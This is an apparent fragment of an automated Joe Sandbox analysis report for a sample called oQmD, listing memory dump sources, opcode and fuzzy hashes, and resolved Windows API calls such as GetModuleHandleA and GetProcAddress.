                          • Instruction ID: 3e4964bb8c0bb12dd1f9238a5b82ac19caaea76d69f2eea8933e03ba6e356177
                          • Opcode Fuzzy Hash: 5ccc5efef6b8b74aba0d80b38871eec96dc7341398e2d3237d4938b0ae5c668a
                          • Instruction Fuzzy Hash: 84016D71A41309AFDF90DF98AC8996FBBACFB55324F00412AF941E22A0E3749605CA51
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: strrchr$lstrcmpilstrcpylstrlen
                          • String ID:
                          • API String ID: 3636361484-0
                          • Opcode ID: 6517d9f2181e4e98b05b5fdb68c974a9c91bbb981785db9098b74e7eb67b964d
                          • Instruction ID: e0e62f1be53640881ff542fe5cf2130b208df4aa1f8204eb4ac42b0b21c061f2
                          • Opcode Fuzzy Hash: 6517d9f2181e4e98b05b5fdb68c974a9c91bbb981785db9098b74e7eb67b964d
                          • Instruction Fuzzy Hash: 2801F9B39046196FEF605760EC4CBDA77DCFF04364F440066EB45E30D0EA74AA848BA4
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0080603C
                          • GetProcAddress.KERNEL32(00000000,00806064), ref: 0080604F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: kernel32.dll
                          • API String ID: 1646373207-1793498882
                          • Opcode ID: fc510d1d61dab6fdb58505a58a0f8fdfa8cc353536f35edb16b6ed3a417f68f4
                          • Instruction ID: f729831abdd1eedde1a9005ba2d7703c20f1b14efc9c4416d3d07891dbfe61bc
                          • Opcode Fuzzy Hash: fc510d1d61dab6fdb58505a58a0f8fdfa8cc353536f35edb16b6ed3a417f68f4
                          • Instruction Fuzzy Hash: 73F0F6F11406898FEFB08E64CC44BDE37E4FF05710F50442AE909CB281DB3486658B18